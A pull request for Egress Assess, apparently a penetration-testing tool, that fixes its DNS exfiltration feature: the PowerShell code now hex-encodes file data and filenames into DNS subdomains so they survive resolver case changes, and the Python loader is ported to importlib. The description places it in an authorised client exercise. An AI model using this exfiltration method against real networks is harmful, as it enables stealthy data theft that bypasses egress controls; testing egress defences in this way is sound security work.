### PR TITLE
DNS Exfiltration Method Fixes

### DIFF
--- a/EgressAssess.ps1
+++ b/EgressAssess.ps1
@@ -2408,8 +2408,8 @@ function Invoke-EgressAssess
                 #Ans       Auth    Add RR
                 [Byte[]]$Mess2= 0x00,0x00,0x00
 
-                $dns_Servers =  ipconfig /all | where-object {$_ -match "DNS Servers"} | foreach-object{$_.Split(":")[1]}
-                
+                $dns_Servers = (Get-DnsClientServerAddress -AddressFamily IPv4).ServerAddresses
+
                 $postS = 0x00,0x00,0x01,0x00,0x01
             }
             

--- a/EgressAssess.ps1
+++ b/EgressAssess.ps1
@@ -2055,7 +2055,14 @@ function Invoke-EgressAssess
 
                     if (!$DefaultLength)
                     {
-                        $DefaultLength = 35
+                        if ($txtmode)
+                        {
+                            $DefaultLength = 35
+                        }
+                        else
+                        {
+                            $DefaultLength = 22
+                        }
                     }
                     if ($DefaultLength -gt 36)
                     {
@@ -2131,14 +2138,26 @@ function Invoke-EgressAssess
                                     $PacketsToSend = 7
                                 }
                             }
-                            $EncodedData += [System.Convert]::ToBase64String( $DataBytes)
+                            if ($txtmode)
+                            {
+                                $EncodedData += [System.Convert]::ToBase64String( $DataBytes)
+                            }
+                            else
+                            {
+                                $EncodedData += [System.BitConverter]::ToString($DataBytes) -replace "-"
+                            }
                             if (!$txtmode)
                             {
                                 if ($filetransfer)
                                 {
-                                    $EncodedData += "." + [System.Convert]::ToBase64String( [System.Text.encoding]::ASCII.GetBytes($filename) )
+                                    # Convert the filename into ASCII bytes, then convert to hexadecimal
+                                    $hexString = [BitConverter]::ToString([System.Text.Encoding]::ASCII.GetBytes($filename)) -replace "-"
+
+                                    # Add a dot before the hex string and append it to the encoded data
+                                    $EncodedData += "." + $hexString
                                 }
-                                $EncodedData = $EncodedData -replace "=", ".---"
+
+                                # Append the IP address
                                 $EncodedData += ".$IP"
                             }
                             $EncodedData += "`n"
@@ -2180,8 +2199,7 @@ function Invoke-EgressAssess
                                 }
                                 else
                                 {
-                                    $EncodedData += "." + [System.Convert]::ToBase64String( [System.Text.encoding]::ASCII.GetBytes($filename) )
-                                    $EncodedData = $EncodedData -replace "=", ".---"
+                                    $EncodedData += "." + [BitConverter]::ToString([System.Text.Encoding]::ASCII.GetBytes($filename)) -replace "-"
                                     $EncodedData += ".$IP"
                                 }
                                 $response = Send-DNSPacket $EncodedData $txtmode

--- a/common/orchestra.py
+++ b/common/orchestra.py
@@ -1,11 +1,9 @@
 """
-
 This is the conductor which controls everything
-
 """
 
 import glob
-import imp
+import importlib.util
 from commandcontrol.malware import *
 from commandcontrol.apt import *
 from protocols.servers import *
@@ -23,31 +21,38 @@ class Conductor:
         self.datatypes = {}
         self.actor_modules = {}
 
+    def load_module(self, name):
+        # Load the module using importlib
+        spec = importlib.util.spec_from_file_location(name.replace("/", ".").rstrip('.py'), name)
+        module = importlib.util.module_from_spec(spec)
+        spec.loader.exec_module(module)
+        return module
+
     def load_client_protocols(self, command_line_object):
         for name in glob.glob('protocols/clients/*.py'):
             if name.endswith(".py") and ("__init__" not in name):
-                loaded_client_proto = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
+                loaded_client_proto = self.load_module(name)
                 self.client_protocols[name] = loaded_client_proto.Client(command_line_object)
         return
 
     def load_server_protocols(self, command_line_object):
         for name in glob.glob('protocols/servers/*.py'):
             if name.endswith(".py") and ("__init__" not in name):
-                loaded_server_proto = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
+                loaded_server_proto = self.load_module(name)
                 self.server_protocols[name] = loaded_server_proto.Server(command_line_object)
 
     def load_datatypes(self, command_line_object):
         for name in glob.glob('datatypes/*.py'):
             if name.endswith(".py") and ("__init__" not in name):
-                loaded_datatypes = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
+                loaded_datatypes = self.load_module(name)
                 self.datatypes[name] = loaded_datatypes.Datatype(command_line_object)
 
     def load_actors(self, command_line_object):
         for name in glob.glob('commandcontrol/malware/*.py'):
             if name.endswith(".py") and ("__init__" not in name):
-                loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
+                loaded_actors = self.load_module(name)
                 self.actor_modules[name] = loaded_actors.Actor(command_line_object)
         for name in glob.glob('commandcontrol/apt/*.py'):
             if name.endswith(".py") and ("__init__" not in name):
-                loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
+                loaded_actors = self.load_module(name)
                 self.actor_modules[name] = loaded_actors.Actor(command_line_object)

--- a/protocols/clients/dns_client.py
+++ b/protocols/clients/dns_client.py
@@ -74,7 +74,9 @@ class Client:
                     print('[*] Shutting down...')
                     sys.exit()
             else:
-                encoded_data = base64.b64encode(str(struct.pack('>I', packet_number)) + ".:|:." + data_to_transmit[byte_reader:byte_reader + self.length])
+                encoded_data = base64.b64encode(
+                    struct.pack('>I', packet_number) + b".:|:." + data_to_transmit[byte_reader:byte_reader + self.length]
+                )
 
                 while len(encoded_data) > self.max_length:
 

--- a/requirements.txt
+++ b/requirements.txt
@@ -1,4 +1,4 @@
-scapy==2.4.5
+scapy==2.6.0
 paramiko==2.10.3
 dnspython==2.2.1
 dnslib==0.9.19


### PR DESCRIPTION
We were planning to use Egress Assess for a DNS exfiltration exercise for a client of Maveris' when we were quickly met with Python exceptions. The first interpreter we used was Python 3.10 and it was discovered the current Python code is broken out of the box with this version. From my understanding, core libraries in updated Python versions changed some APIs and were expecting data of different types. After this, we discovered the DNS resolved method used base64 for the subdomains. This is an issue if the environment uses upstream DNS servers which can scramble the casing of the subdomain and randomize it and all decoded base64 will be inaccurate. Hence, it was replaced with hexadecimal. It was then run with a different Python interpreter (3.12) where further issues were discovered and ultimately fixed due to library changes.